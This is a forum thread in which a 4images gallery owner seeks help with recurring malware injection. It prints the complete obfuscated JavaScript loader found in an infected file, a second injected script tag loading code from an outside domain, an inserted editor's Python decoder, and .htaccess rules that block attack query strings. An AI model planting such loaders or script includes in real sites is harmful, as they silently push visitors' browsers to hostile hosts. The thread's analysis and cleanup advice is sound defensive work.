Author Topic: Malware infection  (Read 7028 times)


Offline marcinos

  • Newbie
  • *
  • Posts: 23
    • View Profile
Malware infection
« on: May 24, 2012, 08:36:00 PM »
Hello

I have a problem: from time to time my gallery is hit by a malware attack.
Code gets added to the files page_footer.php, page_header.php, index.php, login.php, and to the templates index.html, header.html, footer.html.

Recently it added a redirect to:

The page rolyjyl.ru has been reported as a dangerous site and was blocked by security settings.

www.fotografie.malopolska.pl

It also added a file:

Code: [Select]


<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> Web Posting Information </title>
</head>

<body><!--d93065-->                                                                                                                                                                                                        <script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";
}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;567!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><!--/d93065-->

<!-- postinfo.html version 0.100>
<!--
This file allows users to post files to their web with the Web Publishing Wizard or FrontPad, using the same username and password they would
use if they were authoring with the FrontPage Explorer and Editor.

The values below are automatically set by FrontPage at installation
time.  Normally, you do not need to modify these values, but in case
you do, the parameters are as follows:

'BaseURL' is the URL for your web server.

'DefaultPage' is the name of the default (home) page name
for your web.

'XferType' specifies that the FrontPage server extensions have been
installed on this web.  This value should not be changed.

'FPShtmlScriptUrl', 'FPAuthorScriptUrl', and 'FPAdminScriptUrl' specify
the relative urls for the scripts that FrontPage uses for remote
authoring.  These values should not be changed.

'version' identifies the version of the format of this file, and
should not be changed.
--><!-- WebPost
    version="0.100"
    BaseUrl="http://marcinz.webd.pl"
    XferType="FrontPage"
    DefaultPage="index.htm"
    FPShtmlScriptUrl="_vti_bin/shtml.exe/_vti_rpc"
    FPAuthorScriptUrl="_vti_bin/_vti_aut/author.exe"
    FPAdminScriptUrl="_vti_bin/_vti_adm/admin.exe"
-->
<p><!--webbot bot="PurpleText"
preview="This page is created in the root directory of your FrontPage web when FrontPage is installed.  It contains information that allows users to edit pages in your web using the Microsoft Web Publishing Wizard or programs which use the Microsoft Web Publishing Wizard such as FrontPad using the same username and password they would use if they were authoring with Microsoft FrontPage. If you do not want to allow users to edit files on this web using tools other than Microsoft FrontPage, you can delete this file."
--></p>

<h1>Web Publishing Information </h1>

<p>The HTML comments in this page contain the configurationinformation
that allows users to edit pages in your web using the Microsoft
Web Publishing Wizard or programs which use the Microsoft Web
Publishing Wizard such as FrontPad using the same username and
password they would use if they were authoring with Microsoft
FrontPage. Please refer to the Microsoft's Internet SDK for more
information on the Web Publishing Wizard APIs. </p>
</body>
</html>
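The injected loader at the top of that file keeps its real payload as a long string of numbers separated by the letter "f"; at run time it splits on "f", adds 42 to each number, maps it through String.fromCharCode and hands the result to eval (the `"fromC"+"harCode"` and `"e"+"va"+"l"` pieces are there only to dodge simple signature matching). The Python below is an editor's example added here, not code from the original post or from 4images: it repeats that decoding offline so the payload can be read without ever executing it. The input is the script block exactly as posted (only the run of padding spaces before `<script>` is left out); the regexes that find the array and the `+42` offset are written for this particular loader and are an assumption about other variants.

```python
import re

# The injected block as posted above (padding spaces before <script> omitted).
# This is the page's own data, not a constructed sample.
ENCODED = (
    "-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f"
    "-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f"
    "-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f"
    "55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f"
    "-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f"
    "73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f"
    "60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f"
    "57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f"
    "-3f2f-3f62f74f74f70f16f5f5f55f76f69f68f58f69f76f4f72f75f5f57f69f75f68f74f8f15f4f70f62f70f-3f-1f17f60f4f73f74f79f66f59f4f76f63f"
    "73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f"
    "74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f"
    "74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f"
    "74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f"
    "59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83"
)
INJECTED_SCRIPT = (
    "<!--d93065--><script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['"
    + ENCODED
    + "'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];"
    "try{q=document.createElement(\"div\");q.appendChild(q+\"\");}"
    "catch(qwg){w=f;s=[];}r=String;z=((e)?h:\"\");"
    "for(;567!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);}"
    "if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script><!--/d93065-->"
)


def injection_markers(html):
    """Names of <!--x-->...<!--/x--> comment pairs. The injector wraps each insert
    in one so it can locate (and later replace) its own block."""
    return [m.group(1) for m in re.finditer(r"<!--([A-Za-z0-9]+)-->.*?<!--/\1-->", html, re.S)]


def decode_injected_script(html):
    """Reproduce the loader's decoding without executing it: split the quoted
    array on 'f', add the offset it uses in w[j]*1+OFFSET, map each number to a
    character. The result is the JavaScript that eval() would have run."""
    arr = re.search(r"f=\['([-0-9f]+)'\]", html)
    key = re.search(r"\*1\+(-?\d+)\)", html)
    if not arr or not key:
        raise ValueError("no recognisable 'f'-split loader in input")
    offset = int(key.group(1))
    return "".join(chr(int(tok) + offset) for tok in arr.group(1).split("f"))


def iframe_urls(decoded_js):
    """Remote URLs the decoded payload points the visitor's browser at."""
    return sorted(set(re.findall(r"https?://[^\s'\"<>]+", decoded_js)))


if __name__ == "__main__":
    payload = decode_injected_script(INJECTED_SCRIPT)
    print("markers:", injection_markers(INJECTED_SCRIPT))
    print(payload)
    print("contacts:", iframe_urls(payload))
```

Running it shows the payload is a hidden 10x10 iframe injected into `<body>`, so the browser warning the poster saw is the visitor's browser reacting to that third-party frame, not to anything visible in the page. The same decoder works on the other files listed in the post as long as they carry the same loader; a loader with a different offset or separator needs the two regexes adjusted.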



Offline Nosferatu

  • Full Member
  • ***
  • Posts: 230
    • View Profile
    • Project-Firepower
Re: Malware infection
« Reply #1 on: May 25, 2012, 06:58:16 PM »
Sorry, I don't really know what you want from us.

Offline marcinos

  • Newbie
  • *
  • Posts: 23
    • View Profile
Re: Malware infection
« Reply #2 on: May 29, 2012, 07:25:53 PM »
Today something again wrote code like this into the page:

Code: [Select]
<!--pizda--><script type=text/javascript src=http://mmm2011.ppcsoft.in/validate.js?ftpid=3329></script><!--/pizda-->
and Avast! detects an infection.

Where is the flaw that infects my page?

Offline yousaf

  • Jr. Member
  • **
  • Posts: 59
    • View Profile
Re: Malware infection
« Reply #3 on: May 29, 2012, 08:34:08 PM »
It seems no one here can guess from the errors you show what is actually doing this to your site, so you will have to sort out this issue yourself. Since I am not a PHP expert, I can only give you one simple piece of advice: replace all the PHP files of your 4images site with new ones (this applies if you are not using a highly modified 4images script on your site). If you are, then keep only the "Data" & "Templates" folders and reinstall the 4images script of the same version on your server. If the same thing happens again, there are two other possible reasons: either your template files are also infected, or there is another script on your server which allows people/spammers to modify every PHP file on your server.

Offline sathishIPL

  • Jr. Member
  • **
  • Posts: 54
    • View Profile
Re: Malware infection
« Reply #4 on: May 30, 2012, 06:30:08 AM »

Follow the steps yousaf gave above. Once you have cleaned your code, add the code below to .htaccess; it will prevent attacks of this kind to some extent.

It may help you...


RewriteEngine On

# proc/self/environ? no way!
RewriteCond %{QUERY_STRING} proc/self/environ [OR]

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]

# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Any request matching one of the conditions above gets a 403 Forbidden
# (with [F] the rewrite target is ignored, so nothing is sent to the homepage)
RewriteRule ^(.*)$ index.php [F,L]


Offline marcinos

  • Newbie
  • *
  • Posts: 23
    • View Profile
Re: Malware infection
« Reply #5 on: June 03, 2012, 09:47:16 AM »
And after cleaning the code as advised, it is still the same:

http://imageshack.us/photo/my-images/696/malwaree.jpg